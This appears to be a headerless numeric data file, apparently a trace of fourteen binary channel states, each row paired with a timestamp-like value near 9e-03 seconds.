0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9744280e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9744520e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9745000e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9745240e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9745760e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9746000e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9746040e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,8.9746240e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9746520e-03 0,0,1,0,1,1,0,0,0,0,0,0,0,0,8.9746560e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9746600e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9746760e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9747000e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9747240e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9747480e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9747560e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,8.9747720e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9748000e-03 0,0,1,0,1,1,0,0,0,0,0,0,0,0,8.9748040e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9748080e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9748520e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9748760e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9749240e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9749480e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9750000e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9750280e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,8.9750520e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9750760e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9750840e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9751000e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9751240e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9751480e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9751720e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9752000e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9752240e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9752520e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9752760e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9753000e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9753240e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9753480e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9753720e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9754000e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9754240e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9754520e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9754760e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9754800e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,8.9755000e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9755240e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9755320e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9755760e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9756000e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9756520e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9756760e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9757240e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9757480e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9758000e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9758280e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,8.9758520e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9758760e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9758840e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9759000e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9759240e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9759320e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,8.9759480e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9759720e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9759800e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9760280e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9760520e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9761080e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9761400e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9761880e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9762120e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9762600e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9762880e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9762920e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,8.9763120e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9763400e-03 0,0,1,0,1,1,0,0,0,0,0,0,0,0,8.9763440e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9763480e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9763640e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9763880e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9764120e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9764360e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9764600e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9764880e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9765120e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9765400e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9765640e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9765880e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9766120e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9766360e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9766600e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9766880e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9767120e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9767400e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9767640e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9767880e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9768120e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9768360e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9768600e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9768880e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9769120e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9769400e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9769640e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9769880e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9770120e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9770360e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9770600e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9770880e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9771120e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9771400e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9771640e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9771880e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9772120e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9772360e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9772600e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9772880e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9773120e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9773400e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9773640e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9773880e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9774120e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9774360e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9774600e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9774880e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9775120e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9775400e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9775640e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9775880e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9776120e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9776360e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9776600e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9776880e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9777120e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9777400e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9777600e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9777840e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9778120e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9778360e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9778600e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9778840e-03 0,0,1,0,1,0,0,0,0,1,0,0,0,0,8.9778880e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9778920e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,1,9.1016520e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,1,9.1018600e-03 1,0,1,0,1,1,0,0,0,1,0,1,0,1,9.1018760e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,1,9.1019000e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,1,9.1022120e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,1,9.1022360e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,1,9.1022600e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,1,9.1022840e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,1,9.1023080e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,1,9.1023320e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,1,9.1023560e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,1,9.1023800e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,1,9.1024080e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,1,9.1024320e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,1,9.1024600e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1024840e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1024880e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1025080e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1025320e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1025560e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1025800e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1025880e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1026080e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1026320e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1026600e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1026840e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1027080e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1027320e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1027560e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1027800e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1028080e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1028320e-03 1,0,1,0,1,1,0,0,0,0,0,0,0,0,9.1028360e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1028400e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1028600e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1028840e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1029080e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1029320e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1029400e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1029560e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1029800e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1030080e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1030320e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1030600e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1030840e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1031080e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1031320e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1031400e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1031560e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1031800e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1032080e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1032320e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1032360e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1032600e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1032840e-03 1,0,1,0,1,1,0,0,0,0,0,0,0,0,9.1032880e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1032920e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1033080e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1033320e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1033560e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1033800e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1034080e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1034320e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1034600e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1034840e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1034880e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1035080e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1035320e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1035400e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1035560e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1035800e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1036080e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1036320e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1036600e-03 1,0,1,0,1,0,0,0,0,1,0,0,1,0,9.1036840e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1036880e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1037120e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1037400e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1037640e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1037880e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1038120e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1038360e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1038440e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1038600e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1038880e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1039120e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1039400e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1039640e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1039880e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1039920e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1040120e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1040360e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1040600e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1040880e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1041120e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1041400e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1041640e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1041880e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1041960e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1042120e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1042360e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1042600e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1042880e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1042920e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1043120e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1043400e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1043440e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1043640e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1043880e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1044120e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1044360e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1044600e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1044920e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1045160e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1045400e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1045480e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1045680e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1045920e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1046000e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1046200e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1046440e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1046920e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1047160e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1047680e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1047960e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1048440e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1048680e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1049160e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1049400e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1049960e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1050200e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1050680e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1050920e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1051160e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1051400e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1051680e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1051920e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1051960e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1052200e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1052440e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1052680e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1052920e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1053160e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1053400e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1053680e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1053920e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1054200e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1054440e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1054520e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1054680e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1054960e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1055200e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1055480e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1055720e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1055960e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1056200e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1056440e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1056680e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1056960e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1057720e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1057920e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1058040e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1058160e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1058760e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1058960e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1059160e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1059760e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1059960e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1060200e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1060440e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1060520e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1060680e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1060880e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1061080e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1061320e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1061560e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1061800e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1061880e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1062000e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1062200e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1062800e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1063000e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1063480e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1064040e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1064520e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1064720e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1065160e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1065400e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1065880e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1066080e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1066520e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1067000e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1067400e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1067640e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1067880e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1068120e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1068360e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1068560e-03 1,0,1,0,1,0,0,0,0,1,0,0,0,0,9.1068600e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1068640e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1068760e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1069000e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1069240e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1069480e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1069680e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1069880e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1070120e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1070360e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1070440e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1070600e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1070800e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1071080e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1071320e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1071560e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1071800e-03 1,0,1,0,1,0,0,0,0,1,0,0,0,0,9.1071840e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1071880e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1072040e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1072280e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1072560e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1072800e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1073080e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1073320e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,9.1073560e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,9.1073800e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1073880e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1074040e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1074280e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1074560e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1074800e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1075320e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1075560e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1076040e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1076280e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1076800e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1077080e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1077560e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1077800e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1078280e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1078600e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1079080e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1079320e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1079560e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1079800e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1080080e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1080320e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1080600e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1080840e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1081080e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1081320e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1081560e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1081800e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1082080e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1082320e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1082600e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1082840e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1083080e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1083360e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1083600e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1083880e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,9.1084120e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,9.1084360e-03 